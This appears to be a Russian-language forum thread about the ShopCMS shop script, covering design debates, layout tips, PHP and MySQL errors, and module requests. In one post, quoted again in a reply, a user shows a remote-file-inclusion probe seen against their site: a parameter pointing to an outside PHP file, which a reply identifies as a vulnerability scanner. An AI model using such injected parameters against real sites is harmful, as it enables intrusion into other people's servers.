ShopCMS - 1 часть

Статус
В этой теме нельзя размещать новые ответы.
Вот это (Для просмотра ссылки Войди или Зарегистрируйся) ты называешь дизайном????:eek:

ОТРЫВ БАШКИ... (можешь сам, в меру нетрезвым, за пару часов слепить)

А если отключить графику (для примера), то слов просто нет.
Буржуйские магазы в основном имеют однотипный дизайн. Не спорю - есть отличные дизы, которые делали с головой, люди, имеющие представление о том, что они делают.
Хотя конечно - вкус дело индивидуальное...
И натянуть можно любой дизайн (от любого скрипта), не говоря уже о том, что можно просто включить голову (отключить мобилу и аську) и сделать самому!
А тенденция сейчас как раз в том, что скрипты движков или бесплатные, или имеют простой стандартный диз (порой жуткий).
Знаешь почему?
Потому что шаблоны и модули можно неплохо продать по отдельности, порой дороже скрипта в неск. раз.
Сделаешь сам - будет индивидуальный дизайн.
Скачаешь с инета - будет одним сайтом больше в сотне таких-же одинаковых магазинов.
Есть еще вариант - купить!
На самом деле вариант не особо страшный, т.к. учитывая, что сам скрипт достался на халяву, а клиенту по любому зарядишь не меньше 300$, то покупка шаба за 30...100$ не особо огорчит.

Может я чего то не понимаю (молодой еще) но мне нравиться такой минималистический дизайн +(красивые растяжки, яркие картинки). Сам говорил вкус дело индивидуальное...
С отключенной графий согласен... зрелище жуткое.

Хорошо что есть еще такие люди как ты, с принципом Жадность рождает бедность!!! которым не жалко поделиться своими заниями с молодыми.

Я просто хотел узнать как сделать Шапку и подвал резинкой , а центральную часть фиксированной ширины
 
на шапкку ставь 100% на середину 990, 960 align="center" как тебе надо, на подвал 100% , вот и все
 
и все таки как заставить высветить php ошибки на экран, экранирование в error_handler.php строку set_error_handler('error_reporting_log');
и в .htaccess php_value display_errors 1 не помогают, искусственно вызванная ошибка, и сразу пустой экран
 
admin.php

Nemogu ponimatb po4emu admin nerabotaet. admin.php pokazivaet

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: YES) in /home/store/public_html/includes/database/mysql.php on line 9

Warning: mysql_get_server_info(:( supplied argument is not a valid MySQL-Link resource in /home/store/public_html/includes/database/mysql.php on line 10
Database connection problem!


no klientskaja 4astb rabotaet normalna. Versija skripta 3.0.
 
Поднимаю опять вопрос про вирусы в shopcms.
Перезалил все файлы.
Заходит на сайт один товарищ с таким запросом
Для просмотра ссылки Войди или Зарегистрируйся моего сайта//////?_SERVER[DOCUMENT_ROOT]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt????
Отдельно заходя по ссылке Для просмотра ссылки Войди или Зарегистрируйся
выводит
zfxid.txt
<?php echo("Shiro"."Hige"); die("Shiro"."Hige"); ?>
Что за код кто знает?
 
Тема по парсерам которые делались для ShopCms если кого интереует, то развиваем улучшаем!
 
Подскажите как там работать с партнерской программой? Что то не догоню как ее включить, и как региться народу в ней.. :ah:
 
Народ очень нужен модуль оплаты LIQPAY для версии ShopCMS 3.1
Поделитесь у кого есть :thenks:
 
Поднимаю опять вопрос про вирусы в shopcms.
Перезалил все файлы.
Заходит на сайт один товарищ с таким запросом
Для просмотра ссылки Войди или Зарегистрируйся моего сайта//////?_SERVER[DOCUMENT_ROOT]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt????
Отдельно заходя по ссылке Для просмотра ссылки Войди или Зарегистрируйся
выводит
zfxid.txt
<?php echo("Shiro"."Hige"); die("Shiro"."Hige"); ?>
Что за код кто знает?

Это сканер удаленных инклудов, просто проверяет уязвим твой сайт или нет
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху